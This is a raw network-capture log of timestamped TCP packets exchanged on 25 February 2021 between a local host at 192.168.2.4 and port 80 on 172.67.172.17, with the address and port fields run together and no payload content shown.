                                                                                                              Feb 25, 2021 15:10:29.221208096 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.221237898 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.221843004 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.221882105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.221915960 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.221934080 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.221961975 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.221995115 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.221998930 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222026110 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222045898 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222050905 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222068071 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222095966 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222096920 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222119093 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222142935 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222150087 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222165108 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222182989 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222191095 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222234011 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222806931 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222840071 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222860098 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222886086 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222908974 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.222915888 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.222960949 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.223253965 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223278999 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223299980 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223315001 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.223316908 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223344088 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223362923 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223383904 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.223387957 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223409891 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223427057 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223438978 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.223452091 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223469019 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.223485947 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223515987 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223536968 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.223536968 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.223578930 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.224175930 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224248886 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224281073 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224311113 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224319935 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.224339962 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224370003 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.224373102 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224404097 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224426985 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.224433899 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224464893 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224484921 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.224493980 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224529028 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224556923 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.224575996 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.224615097 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.225027084 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225053072 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225076914 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225096941 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225115061 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225116014 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.225141048 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225162029 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225169897 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.225182056 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225202084 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.225208998 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225230932 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.225236893 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225266933 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225282907 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.225296021 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225323915 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.225366116 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.226078033 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226106882 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226129055 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226140976 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.226149082 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226170063 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226182938 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.226191044 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226211071 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226229906 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226241112 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.226249933 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226270914 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226290941 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226301908 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.226310968 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226330996 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.226334095 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.226394892 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.227020979 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227051020 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227076054 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227097034 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227118015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227138996 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227139950 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.227163076 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227184057 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227204084 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227217913 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.227221012 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.227252007 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.227252960 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.279922962 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.279947996 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.279966116 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.279966116 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.279984951 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280009985 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280028105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280050039 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280069113 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280075073 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.280121088 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.280776978 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280795097 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280812979 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280823946 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280844927 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280872107 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280886889 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.280889034 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280910015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280935049 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280951023 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.280960083 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280985117 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.280988932 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281003952 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281016111 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281058073 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281640053 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281656027 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281682014 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281699896 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281723976 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281744003 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281753063 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281764030 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281786919 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281788111 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281804085 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281827927 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281830072 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281852007 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281872034 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.281876087 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281900883 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.281930923 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.282855988 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.282896996 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.282922983 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.282944918 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.282968998 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.282990932 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.282993078 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283013105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283020973 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283036947 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283065081 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283071041 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283087969 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283109903 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283111095 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283133030 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283149958 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283160925 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283490896 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283555031 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283581018 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283606052 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283628941 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283646107 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283652067 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283675909 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283689022 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283698082 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283716917 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283731937 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283740044 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283761978 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283762932 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283785105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283807039 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283813953 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.283833981 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.283842087 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284514904 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284540892 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284564972 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284585953 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284599066 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284610033 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284627914 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284632921 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284657955 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284660101 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284684896 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284707069 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284713984 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284729958 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284754038 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284755945 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284775019 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284799099 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.284804106 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.284845114 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.285479069 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285504103 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285525084 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285552025 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285576105 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285579920 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.285598040 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285608053 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.285620928 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285640955 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.285643101 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285665035 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285686970 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285689116 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.285710096 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285732031 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.285734892 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285759926 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.285780907 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.286443949 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286468983 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286492109 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286513090 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.286545992 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.286586046 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286608934 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286633015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286655903 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286679983 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286684036 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.286703110 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.286710978 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.286747932 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.287111044 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287132978 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287151098 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287169933 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287195921 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287210941 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.287220001 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287244081 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287254095 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.287267923 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287286043 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.287290096 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287309885 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.287319899 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287342072 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287364006 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.287364006 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287390947 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.287415981 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.288072109 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.298293114 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.298316002 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.298338890 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.298346996 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.298362017 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.298418999 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.298998117 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299026012 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299047947 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299072027 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299079895 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299098015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299124002 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299127102 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299145937 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299160957 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299170017 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299194098 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299201965 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299216032 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299240112 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299262047 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299272060 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299288034 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.299319983 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299345016 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.299977064 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300004959 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300028086 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300050974 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300081015 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300093889 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.300105095 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300122976 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.300128937 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300152063 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300173998 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300180912 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.300199986 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300206900 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.300223112 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300246000 CET8049728172.67.172.17192.168.2.4
                                                                                                              Feb 25, 2021 15:10:29.300247908 CET4972880192.168.2.4172.67.172.17
                                                                                                              Feb 25, 2021 15:10:29.300270081 CET8049728172.67.172.17192.168.2.4
